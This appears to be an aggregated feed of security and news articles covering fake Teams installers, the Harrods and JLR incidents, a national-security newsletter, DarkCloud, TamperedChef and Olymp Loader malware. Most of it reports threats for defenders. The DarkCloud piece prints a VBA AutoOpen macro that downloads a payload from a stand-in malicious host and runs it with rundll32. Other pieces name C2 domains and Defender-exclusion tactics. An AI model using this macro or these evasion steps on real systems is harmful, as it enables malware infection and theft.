• A sophisticated cyber campaign is exploiting the trust users place in popular collaboration software, tricking them into downloading a weaponized version of Microsoft Teams to gain remote access to their systems.

    Threat actors are using search engine optimization (SEO) poisoning and malicious advertisements to lure unsuspecting victims to fraudulent download pages, a tactic that closely mirrors previous campaigns involving other trusted software.

    Blackpoint has identified a new wave of attacks where users searching for “Microsoft Teams download” are presented with malicious ads that redirect them to spoofed websites.

    One such domain, teams-install[.]top, has been observed impersonating the official Microsoft download portal, offering a malicious file named MSTeamsSetup.exe.

    To appear legitimate, these fake installers are often signed with untrustworthy digital certificates from issuers like “4th State Oy” and “NRM NETWORK RISK MANAGEMENT INC.”. This technique helps bypass basic security checks that flag unsigned software.

    Malicious domain
    Malicious domain

    Weaponized Microsoft Teams Delivers Oyster Backdoor

    Executing the fraudulent installer triggers a multi-stage attack that deploys a persistent backdoor known as Oyster, or Broomstick.

    The malware drops a malicious DLL file named CaptureService.dll into the %APPDATA%\\Roaming folder and establishes persistence by creating a scheduled task called CaptureService.

    This task is configured to run the DLL periodically, ensuring the backdoor remains active even after a system reboot and allowing it to blend in with normal Windows activity.

    The Oyster backdoor provides attackers with a strong foothold in the compromised network.

    It allows for remote access, collects system information, and establishes communication with command-and-control (C2) servers to exfiltrate data and receive further instructions or payloads.

    In this campaign, Oyster has been observed communicating with C2 domains such as nickbush24[.]com and techwisenetwork[.]com, Blackpoint analysis revealed.

    Attack Chain

    This campaign is not an isolated incident but part of a broader trend where cybercriminals weaponize well-known software brands to achieve initial access. The tactics are similar to previous campaigns that distributed fake installers for PuTTY, WinSCP, and Google Chrome.

    By leveraging malvertising and SEO poisoning, attackers can effectively target a wide audience, exploiting user trust in both search engines and popular enterprise tools.

    The use of the Oyster backdoor is particularly concerning, as it has been linked to ransomware operations like Rhysida, which have used it to infiltrate corporate networks.

    This strategy highlights a shift where threat actors are not just relying on phishing emails but are actively poisoning the software supply chain at the user-download level.

    The campaign is designed to bypass some traditional antivirus and endpoint detection and response (EDR) solutions, making it a stealthy and dangerous threat.

    To mitigate this risk, organizations and individuals are strongly advised to download software exclusively from official vendor websites.

    Using saved bookmarks for frequently accessed download pages is recommended over relying on search engine results, especially sponsored advertisements. Vigilance and user education remain critical lines of defense against these evolving social engineering tactics.

    Follow us on Google News, LinkedIn, and X for daily cybersecurity updates. Contact us to feature your stories.

    The post Hackers Trick Users to Download Weaponized Microsoft Teams to Gain Remote Access appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Luxury department store Harrods has disclosed a significant data breach affecting approximately 430,000 customer records after a third-party provider was compromised.

    The hackers behind the attack have contacted the retailer, but Harrods has stated it will not engage with the threat actor, suggesting a potential ransom demand was made.

    The breach, which Harrods first communicated to affected customers via email on Friday, September 26, 2025, originated from a security failure at an unnamed external supplier, not from Harrods’ internal systems.

    The company has emphasized that the compromised data is limited to basic personal identifiers and does not include highly sensitive information.

    Harrods Data Breach

    The stolen data primarily includes names and contact details that customers had provided. In some cases, information related to marketing preferences, loyalty program status, and affiliations with Harrods’ co-branded credit cards was also exposed.

    However, a company spokesperson noted that this marketing-related data is “unlikely to be interpreted accurately by an unauthorised third party”.

    Harrods has reassured its customers that no financial information, such as payment card details or account passwords, was accessed during the incident. The breach is understood to have affected a small proportion of the store’s total clientele, as the majority of Harrods customers shop in-store rather than online.

    In response to the incident, Harrods has proactively informed affected e-commerce customers and notified all relevant authorities, including the Information Commissioner’s Office (ICO), in compliance with UK GDPR regulations.

    A spokesperson stated, “Our focus remains on informing and supporting our customers. We have informed all relevant authorities and will continue to co-operate with them”.

    This security event is separate from a previous cyberattack attempt on Harrods’ internal systems in May 2025. That earlier incident, part of a wider series of attacks on UK retailers like M&S and Co-op, prompted Harrods to restrict internet access as a precaution but did not result in a data compromise at the time.

    The recent breach highlights a growing trend of cybercriminals targeting supply chain partners as a weaker link to access data from major corporations. Customers of Harrod’s online store are advised to be vigilant against potential phishing and social engineering attempts.

    Follow us on Google News, LinkedIn, and X for daily cybersecurity updates. Contact us to feature your stories.

    The post New Harrods Data Breach Exposes 430,000 Customer Personal Records appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Threat actors have been observed using seemingly legitimate artificial intelligence (AI) tools and software to sneakily slip malware for future attacks on organizations worldwide. According to Trend Micro, the campaign is using productivity or AI-enhanced tools to deliver malware targeting various regions, including Europe, the Americas, and the Asia, Middle East, and Africa (AMEA) region.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Two Marine veterans killed seven people and wounded 13 others in separate mass shootings just hours apart in Michigan and North Carolina over the weekend. 

    A possible motive still eludes investigators in Grand Blanc, Michigan, where at about 10:30 a.m. ET Sunday an attacker drove his pickup truck—with two American flags raised in the bed—into a Mormon church before opening fire with an assault rifle and setting a portion of the building on fire, Police Chief William Renye told reporters Sunday. 

    The shooter was a 40-year-old former Marine sergeant who served from 2004 to 2008, with a year spent deployed to Iraq, according to the Detroit News. Police quickly responded, eventually shooting and killing the attacker in the church parking lot, but not before he had killed four people and wounded eight others.

    Notable: The Michigan shooter can be seen wearing a camouflage Trump 2020 campaign shirt that says “Make liberals cry again” in a 2019 photograph posted to Facebook USA Today reports. He’d also allegedly “signed two political petitions, one to repeal Gov. Gretchen Whitmer’s COVID mandates and one to outlaw abortion in the state,” local outlet Bridge Michigan reported Sunday. 

    The North Carolina attacker was also a 40-year-old former Marine sergeant who lived nearby and had been wounded while serving in Iraq. Using an assault rifle from his boat, he opened fire at a dockside bar in Southport, south of Wilmington, at about 9:30 p.m. local, killing three people and wounding at least five others. Whereas the Michigan shooter reportedly had no known police record and was awarded a Good Conduct medal while a Marine, the North Carolina shooter was known to police after filing several lawsuits this year against the Department of Veterans Affairs and the local county sheriff’s office. 

    Coast Guard officials arrested him while attempting to retrieve his boat from the water roughly 12 miles from the where the shooting occurred. He’s been charged with three counts of first-degree murder, five counts of attempted first-degree murder and five counts of assault with a deadly weapon, the New York Times reports. 

    A motive eludes investigators in Southport as well. However: “Injured in the line of duty is what he’s saying. He suffers from PTSD. We want to point those facts out,” Police Chief Todd Coring told reporters Sunday. Marine Corps officials say the shooter served from 2003 to 2009, including two deployments to Iraq. 

    The North Carolina shooting appears to have been indiscriminate, and “Sadly, a lot of the victims in this case appear to be not members of our community, but people who are here on vacation,” district attorney Jon David told the Times.

    Panning out: The U.S. has experienced at least 324 mass shootings in 2025, according to the Gun Violence Archive. The country experienced 503 mass shootings last year. 


    Welcome to this Monday edition of The D Brief, a newsletter dedicated to developments affecting the future of U.S. national security, brought to you by Ben Watson with Bradley Peniston. It’s more important than ever to stay informed, so thank you for reading. Share your tips and feedback here. And if you’re not already subscribed, you can do that here. On this day in 1941, the Nazis killed more than 33,000 Jewish people in Kyiv, modern-day Ukraine.

    More troops on American streets

    After sending U.S. troops to Los Angeles, Washington, and Memphis, President Donald Trump ordered 200 more National Guard troops to “war ravaged Portland,” according to a Saturday post on his own social media platform and confirmed Sunday by officials in Oregon. “At the request of Secretary of Homeland Security, Kristi Noem, I am directing Secretary of War, Pete Hegseth, to provide all necessary Troops to protect War ravaged Portland, and any of our ICE Facilities under siege from attack by Antifa, and other domestic terrorists,” the president wrote. 

    The order instructs the National Guard “to protect U.S. Immigration and Customs Enforcement and other U.S. Government personnel,” in what sounds similar to Trump’s order to send troops to Los Angeles. 

    “I am also authorizing Full Force, if necessary,” Trump noted in an unclear detail that raised additional alarm bells regarding rules of engagement, e.g., for civil-military observers in the U.S. 

    Trump’s order is set to last for 60 days, and came less than 20 hours after the Supreme Court let Trump to withhold $4 billion in foreign aid. NPR has more. 

    His announcement also prompted hundreds to protest outside the U.S. Immigration and Customs Enforcement building Sunday afternoon. “Chants and bucket drumming rang in the air during an afternoon demonstration that was raucous but largely free of confrontation,” Oregon Public Broadcasting reported on location. However, “More than a dozen counterprotesters attended the event, an increase from previous nights, and many clashed verbally with demonstrators.”

    Portland is not ravaged by war. Your D Brief-er visited the city and walked the streets with his children just a few weeks ago. There were occasional tents from encampments beneath a highway overpass here and there on the approach to downtown, but there was no “war” except those waged by self-published authors hawking their sci-fi and fantasy books to occasional unwitting pedestrians in the vicinity of Pioneer Courthouse Square—where protests flared five years ago amid nationwide protests against police brutality. 

    Trump: “They are attacking our ICE and federal buildings all the time,” the president told NBC News in a phone interview Sunday. “You know, this has been going on for a long time. This has been going on for years in Portland. It’s like a hotbed of insurrection,” he claimed. 

    Notable: ICE agents in Portland have been documented by the city’s police “instigating” confrontations with protesters, as the local Oregonian newspaper reported Thursday and updated after Trump’s announcement Saturday. 

    “This is not a military target,” Portland Mayor Keity Wilson said at a Saturday press conference. “This is an American city, we do not need any intervention.” 

    Portland city councilman: “To speak the language of federal agents, let me say this, here's your sit rep: Situation normal in Portland. We do not need assistance. We are OK,” said Councilor Eric Zimmerman after Trump’s announcement. 

    Oregon Gov. Tina Kotek: “Contrary to President Trump’s social media posts, Portland is not war-ravaged,” the Democratic governor said in a video posted to social media Sunday. “There is no insurrection. There is no threat to national security, and there is no need for military troops.”

    “Military service members should be dedicated to real emergencies,” she said. “And that’s exactly what I said to the president when I asked him to stand down from sending federal troops into our city. But just in case that phone call wasn’t enough, I thought I’d take to the streets myself right here in downtown Portland.” The rest of her video is a dispatch on location, which you can view here

    Other Portland residents have been posting photos showing how “war-ravaged” their city is. Democratic Sen. Ron Wyden has been drawing attention to some of these posts on his own social media account, here.

    New: Like California before it, the state of Oregon has sued the Trump administration for this troop deployment to Portland. As a judge ultimately decided for Los Angeles, Oregon alleges the National Guard order “violates the Posse Comitatus Act,” calls the “stated basis for federalizing…patently pretextual,” and claims Trump’s order “violate[s] the Tenth Amendment’s guarantee that the police power … resides with the states.” 

    Related reading:

    Around the Pentagon

    The president has decided to join Hegseth’s surprise gathering of brass tomorrow at Quantico, the Washington Post reported Sunday: “Trump’s appearance at Marine Corps Base Quantico in Virginia not only overshadows Hegseth’s planned address but adds new security concerns to the massive and nearly unprecedented military event, which has required some generals and admirals to travel thousands of miles. Trump cast the discussion largely as a pep talk.”

    Three sources familiar with the planning told CNN that Hegseth intends to underscore the “warrior ethos,” outline a new vision for the US military, and “discuss new readiness, fitness and grooming standards.” One defense official familiar with the planning said, “This is a showcase for Hegseth to tell them: get on board, or potentially have your career shortened.” More from CNN, here.

    The short-notice, unprecedented confab has drawn urgent questions from Capitol Hill: In a Saturday letter, Senate Armed Services Committee members Tammy Duckworth, D-Ill., and Mazie K. Hirono, D-Hawaii, asked Hegseth 19 questions, including: 

    • What is the estimated total cost of this gathering?
    • What accounts are being used to fund these costs?
    • Why was a secure virtual alternative not considered sufficient? 
    • Has the Department conducted a risk assessment of concentrating much of the operational chain of command in one location?  
    • Has this gathering disrupted any other scheduled operations, training or interagency coordination?  
    • Has any previous Secretary of Defense convened a similar gathering under comparable circumstances?  

    The letter ends: “We require a briefing or written response to answer these questions no later than Monday September 29, 2025.” Read over the rest of the queries (PDF) here

    Commentary from Mark Cancian, who posted at CSIS, and UCMJ expert Eugene Fidell, writing at Just Security.

    Around the world

    Trump’s $20B bailout for Argentina stirs anger in ‘America First’ camp. WaPo on Sunday: “The president’s customary allergy to using taxpayer money to help other nations makes the Argentine rescue especially noteworthy. Since taking office in January, Trump has slashed U.S. foreign aid programs, slow-walked military assistance for Ukraine and demanded that close allies like South Korea and Japan pay for a greater share of their defense.”

    And Politico on Thursday: “The fast-moving deal to help [Argentine President Javier] Milei, which is still being negotiated, underscores the extent to which the Trump administration is willing to go to help a political ally who has cultivated strong ties with the president and American conservatives in recent years.”

    And lastly today: South Korea to honor 11 military members who disobeyed illegal orders during last year’s attempted coup. Officials with the Ministry of National Defense announced last week that it will award government commendations to soldiers who “did not carry out illegal or unjust orders and upheld their duties as military personnel” when the country’s president attempted a coup last December. “We will do our best to become a military trusted by the public by continuously identifying and commending genuine soldiers who can resolutely reject illegal or unjust orders according to constitutional values and reject injustice,” the ministry said in a statement. The Chosun Daily has details, here.

    ]]>

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • A newly observed spear-phishing campaign is leveraging sophisticated social engineering lures to distribute DarkCloud, a modular malware suite designed to harvest keystrokes, exfiltrate FTP credentials and gather system information.

    Over the past month, targeted emails masquerading as legitimate software updates or corporate invoices have reached unsuspecting recipients across various industries.

    These messages carry a weaponized Microsoft Word attachment that, when opened, triggers a multi-stage infection chain.

    Initial reconnaissance indicates that threat actors behind the campaign have invested considerable effort into crafting believable messages, demonstrating a high level of operational security and tradecraft.

    Shortly after the victim enables macros in the document, a hidden Visual Basic for Applications (VBA) script executes, reaching out to a command-and-control (C2) server to download the next-stage payload.

    Phishing lure (Source – eSentire)

    This payload, the DarkCloud loader, is capable of unpacking additional modules directly into memory, evading disk-based detection and complicating forensic analysis.

    Analysts note that the loader checks for virtual machine artifacts and sandboxing environments, delaying execution or aborting if analysis tools are detected.

    eSentire researchers identified DarkCloud’s core keylogging component within hours of the campaign’s initial detection.

    They observed the malware injecting a dynamic-link library into common processes such as explorer.exe and svchost.exe, establishing hooks on keystroke APIs to capture user input.

    This approach ensures that every typed character—including credentials entered into web-based FTP clients—can be intercepted.

    The harvested data is then encrypted with a custom XOR-based algorithm and sent to the C2 infrastructure under the guise of legitimate HTTPS traffic, blending in with normal network flows.

    DarkCloud website marketed as legitimate software (Source – eSentire)

    Aside from credential theft, DarkCloud exhibits advanced reconnaissance capabilities. It gathers system information—such as running processes, installed software, and open network connections—and transmits this metadata back to the attackers.

    This enrichment allows the operators to tailor subsequent modules, such as a remote file exfiltration plugin or a screen-capture component, to the victim’s environment.

    Throughout the campaign, the threat actors pivot between modules to maximize data collection while minimizing forensic footprints.

    Infection Mechanism and Loader Dynamics

    The infection sequence begins with a lure document containing an obfuscated VBA macro. Upon activation, the macro executes the following sequence:-

    Sub AutoOpen()
        Dim xmlHttp As Object
        Set xmlHttp = CreateObject("MSXML2.XMLHTTP")
        xmlHttp.Open "GET", "https://malicious.example.com/loader.bin", False
        xmlHttp.send
        Dim shell As Object
        Set shell = CreateObject("WScript.Shell")
        Dim tempPath As String
        tempPath = Environ("TEMP") & "\dcl.dll"
        With CreateObject("ADODB.Stream")
            .Type = 1
            .Open
            .Write xmlHttp.responseBody
            .SaveToFile tempPath, 2
            .Close
        End With
        shell.Run "rundll32.exe " & tempPath & ",EntryPoint"
    End Sub

    Once dcl.dll is loaded, it unpacks additional modules in memory. The loader uses a custom “chunked XOR” routine to decrypt embedded payloads, avoiding dropping executables on disk.

    This memory-resident design allows DarkCloud to maintain persistence via a registry run key, while its modular architecture supports on-demand deployment of new capabilities.

    By combining a convincing spear-phishing vector with a stealthy, in-memory loader and modular plugins, DarkCloud poses a significant threat to organizations that rely on FTP-based file transfers and unified endpoint protection solutions.

    Security teams should monitor abnormal HTTPS sessions to unknown hosts and employ behavioral analysis tools capable of detecting API hook injections. Continuous threat intelligence sharing and rapid incident response will be critical to mitigating DarkCloud’s evolving tactics.

    Follow us on Google NewsLinkedIn, and X to Get More Instant UpdatesSet CSN as a Preferred Source in Google.

    The post New Spear-Phishing Attack Delivers DarkCloud Malware to Steal Keystrokes, FTP Credentials and Others appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • As attackers increasingly leverage Scalable Vector Graphics (SVG) for stealthy code injection, security researchers face mounting challenges in detecting obfuscated payloads embedded within SVG assets. 

    The SVG Security Analysis Toolkit by HackingLZ offers a comprehensive solution: a suite of four Python-based tools designed to reveal hidden scripts, decode obfuscated URLs, and verify protection mechanisms, all without exposing analysts to unsafe execution environments.

    Static and Dynamic Deobfuscation

    The toolkit’s first two components extract.py and extract_dynamic.py work in tandem to uncover malicious scripts through both static and dynamic analysis:

    The extract.py is a static SVG URL Extractor that performs pattern-based analysis without executing any code. 

    It automatically detects and decodes XOR-encrypted payloads via String.fromCharCode patterns, Base64-encoded URLs extracted from data: URIsand character arithmetic schemes using parseInt and XOR loops. Usage examples illustrate its flexibility:

    The extract_dynamic.py  is a dynamic JavaScript Execution, leveraging box-js, safely executing embedded JavaScript within a sandbox to capture final URL constructions. Key features include:

    • Advanced Hook System for monitoring location.assign(), window.open(), and AJAX calls
    • Final URL Prioritization to distinguish complete URLs from partial fragments
    • ActiveX/WScript Support for Windows-specific script monitoring

    Protection Detection

    To complete the analysis workflow, the toolkit includes cf_probe.py and encoder.py.  The cf_probe.py is a Cloudflare Protection Detection program that scans HTTP and meta-refresh redirects for Cloudflare challenges.

    This identifies Turnstile via data-sitekey attributes, scans linked JavaScript for reCAPTCHA or custom CAPTCHA systems, and reports CF headers like CF-Ray and DDoS protection messages.

    The encoder.py is an SVG Test Case Generator; security teams can generate realistic obfuscated SVG samples to validate their detection pipelines. 

    • It supports six obfuscation patterns, including XOR + ES6 Proxy,
    • Hex-encoded Function Constructor and Data URI scripts.

    HackingLZ recommends the following analysis sequence for maximum coverage and safety:

    • Generate Test Cases: encoder.py –random-all -o test_cases/
    • Static Analysis: python3 extract.py -i test_cases/*.svg -v
    • Dynamic Analysis: python3 extract_dynamic.py -i test_cases/ -o dynamic_results/
    • Protection Verification: python3 cf_probe.py -i malicious_urls.txt

    By combining static string decoding, sandboxed script execution, protection detection, and controlled test data generation, the SVG Security Analysis Toolkit empowers defenders to stay ahead of evasive SVG-based phishing and malware campaigns.

    Follow us on Google News, LinkedIn, and X for daily cybersecurity updates. Contact us to feature your stories.

    The post SVG Security Analysis Toolkit to Detect Malicious Scripts Hidden in SVG Files appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Adversaries don’t work 9–5 and neither do we. At eSentire, our 24/7 SOCs are staffed with elite threat hunters and cyber analysts who hunt, investigate, contain and respond to threats within minutes. Backed by threat intelligence, tactical threat response and advanced threat analytics from our Threat Response Unit (TRU), eSentire delivers rapid detection and disruption […]

    The post New Spear-Phishing Attack Deploys DarkCloud Malware to Steal Keystrokes and Credentials appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • A sophisticated malware campaign has emerged that weaponizes seemingly legitimate productivity tools to infiltrate systems and steal sensitive information.

    The TamperedChef malware represents a concerning evolution in threat actor tactics, utilizing trojanized applications disguised as calendar tools and image viewers to bypass traditional security defenses.

    This campaign demonstrates how cybercriminals increasingly exploit user trust in digitally signed software to facilitate initial access and establish persistent footholds within targeted environments.

    The malware campaign centers around two primary applications: Calendaromatic.exe and ImageLooker.exe, both masquerading as benign productivity software while harboring malicious capabilities.

    These applications are distributed through self-extracting 7-Zip archives that exploit CVE-2025-0411 to evade Windows’ Mark of the Web protections, allowing them to execute without triggering SmartScreen warnings or other reputation-based security controls.

    The campaign leverages deceptive advertising and search engine optimization techniques to direct victims toward malicious downloads, often targeting users searching for free productivity utilities.

    Field Effect analysts identified the campaign on September 22, 2025, during routine analysis of a potentially unwanted application flagged by Microsoft Defender.

    Their investigation revealed a broader distribution network involving multiple suspicious signing publishers and command-and-control infrastructure.

    The researchers discovered that both malicious applications were digitally signed by entities including CROWN SKY LLC and LIMITED LIABILITY COMPANY APPSOLUTE, providing a veneer of legitimacy that helps bypass user suspicion and endpoint defenses.

    The malware’s impact extends beyond simple data theft, as it establishes comprehensive system compromise through browser hijacking, credential harvesting, and persistent backdoor access.

    TamperedChef demonstrates particular sophistication in its ability to exfiltrate browser-stored credentials and session information while simultaneously redirecting web traffic and altering browser settings to facilitate ongoing malicious activities.

    Advanced Evasion Through Unicode Encoding and Framework Exploitation

    The TamperedChef campaign showcases remarkable technical sophistication through its exploitation of modern application frameworks and advanced encoding techniques.

    Both Calendaromatic.exe and ImageLooker.exe are built using NeutralinoJS, a lightweight desktop framework that enables the execution of arbitrary JavaScript code within native applications.

    This framework choice allows the malware to seamlessly interact with system APIs while maintaining the appearance of legitimate desktop software.

    The malware employs Unicode homoglyphs as a primary evasion mechanism, encoding malicious payloads within seemingly benign API responses.

    This technique enables the malware to bypass traditional string-based detection systems and signature matching algorithms that security products rely upon for identification.

    When executed, the malware decodes these hidden payloads and executes them through the NeutralinoJS runtime, effectively creating a covert execution channel that operates beneath the radar of conventional monitoring systems.

    Persistence mechanisms include the creation of scheduled tasks and registry modifications using specific command-line flags such as --install, --enableupdate, and --fullupdate.

    Upon successful installation, the malware establishes immediate communication with command-and-control servers including calendaromatic[.]com and movementxview[.]com, enabling remote operators to issue commands and exfiltrate collected data.

    The network communication occurs through encrypted channels that further complicate detection and analysis efforts by security teams.

    Follow us on Google NewsLinkedIn, and X to Get More Instant UpdatesSet CSN as a Preferred Source in Google.

    The post New TamperedChef Malware Leverages Productivity Tools to Gain Access and Exfiltrate Sensitive Data appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Jaguar Land Rover (JLR) has confirmed it will begin a phased restart of its manufacturing operations in the coming days, nearly a month after a significant cyber attack forced the company to halt production across the United Kingdom.

    The luxury carmaker, owned by India’s Tata Motors, is taking gradual steps to bring its facilities back online while working with national cybersecurity agencies to ensure a secure recovery.

    The incident began on the evening of August 31, 2025, when a cyber attack prompted JLR to suspend all work at its three main UK manufacturing plants in Solihull, Wolverhampton, and Halewood on September 1.

    The shutdown had an immediate and severe impact, halting the production of its world-class vehicles and creating significant disruption throughout its extensive supply chain.

    The stoppage affected over 30,000 direct JLR employees and an estimated 100,000 more working for hundreds of suppliers, many of whom depend heavily on JLR’s orders.

    JLR Confirms Phased Restart

    In a statement, JLR announced its plans for a cautious return to manufacturing. “As the controlled, phased restart of our operations continues, we are taking further steps towards our recovery and the return to manufacture of our world-class vehicles,” a company spokesperson said.

    “Today we are informing colleagues, retailers and suppliers that some sections of our manufacturing operations will resume in the coming days”.

    The restart is expected to begin with the engine plant in Wolverhampton on October 6, with other facilities gradually resuming their functions. However, industry insiders anticipate it could take several weeks before production lines are operating at full capacity again.

    Throughout the shutdown, JLR has been collaborating with cybersecurity specialists, the UK government’s National Cyber Security Centre (NCSC), and law enforcement to manage the crisis.

    “We continue to work around the clock… to ensure our restart is done in a safe and secure manner,” the company stated. While JLR confirmed that “some data” was compromised in the attack, it is still conducting a forensic investigation to determine the full extent of the impact.

    The prolonged production halt placed immense financial pressure on JLR’s supply chain, with many smaller firms facing the risk of insolvency.

    In response, the UK government stepped in over the weekend, offering £1.5 billion in loan guarantees to JLR to help stabilize its cash flow and support its vulnerable suppliers.

    As the foundational work of its recovery gets underway, JLR has thanked its employees, retailers, and partners for their patience and support during the disruption.

    The company has assured it will continue to provide updates as it navigates the complex process of returning to full-scale manufacturing.

    Follow us on Google News, LinkedIn, and X for daily cybersecurity updates. Contact us to feature your stories.

    The post JLR Confirms Phased Restart of Operations Following Cyber Attack appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • The cybersecurity community is currently observing a surge in interest around Olymp Loader, a recently unveiled Malware-as-a-Service (MaaS) platform written entirely in Assembly.

    First advertised on underground forums and Telegram channels in early June 2025, Olymp Loader has rapidly evolved from a rudimentary botnet concept into a sophisticated loader and crypter suite.

    Its author, operating under the alias OLYMPO, touts the service as Fully UnDetectable (FUD), claiming that its advanced design can bypass modern antivirus engines and evade machine-learning–based heuristics.

    Early adopters praise its modular architecture, which integrates credential stealers, crypters, and privilege escalation mechanisms.

    Research indicates that the threat actor behind OLYMPO is a small team with extensive Assembly programming expertise.

    As reported on HackForums and other underground venues, they have implemented features such as deep XOR encryption for payload modules, UAC‐Flood privilege escalation, and automatic Windows Defender exclusions.

    On August 5, 2025, OLYMPO announced pricing tiers ranging from a basic stub at USD 50 to a fully customized injection service at USD 200, with all packages including a “Defender-way” bypass, Defender-removal module, and automatic certificate signing to lend samples a veneer of legitimacy.

    Banner used to advertise Olymp Loader in underground forums posted on June 6, 2025 (Source – Outpost24)

    Outpost24 analysts identified multiple instances of Olymp Loader in the wild, often masquerading as legitimate software.

    For example, binaries named NodeJs[.]exe were distributed via GitHub Releases under the repository PurpleOrchid65Testing, exploiting developer trust in Node.js executables.

    In other cases, the loader was delivered as fake installers for OpenSSL, Zoom, PuTTY, and CapCut, even borrowing official icons and certificates from known applications to trick victims.

    Infection Mechanism and Persistence

    Upon execution, Olymp Loader initiates a multi‐stage process to establish persistence and disable defenses.

    Initial samples observed in June employed a simple batch script: copying the executable to the user’s AppData directory and spawning a cmd[.]exe process to run a timeout command, followed by re‐execution from the new location.

    Behavior of PowerShell execution commands seen in a Olymp sample on public sandboxes (Source – Outpost24)

    A PowerShell script was then launched to create an entry in the StartUp folder, ensuring the loader runs on each system boot.

    By early August, this workflow was augmented with a Defender Remover module, publicly available on GitHub, which executes PowerRun[.]exe and a RemoveSecHealthApp[.]ps1 script to terminate Defender services before adding exhaustive exclusion paths (APPDATA, LOCALAPPDATA, Desktop, StartMenu, and more) via Add-MpPreference.

    The loader’s shellcode component leverages the LoadPE method for code‐cave–based injection into legitimate processes, supporting 32‐bit, 64‐bit, .NET, and Java payloads.

    Unique shellcode initialization routines further obfuscate the loader’s purpose, while a custom certificate signing feature signs both the stub and modules, complicating detection by reputation‐based systems.

    This combination of script‐based persistence, injection techniques, and automatic certificate signing marks a significant advancement in MaaS offerings, lowering the entry barrier for mid‐level cybercriminals and amplifying attack volumes across enterprises and developers alike.

    Follow us on Google NewsLinkedIn, and X to Get More Instant UpdatesSet CSN as a Preferred Source in Google.

    The post New Malware-as-a-Service Olymp Loader Promises Defender-Bypass With Automatic Certificate Signing appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶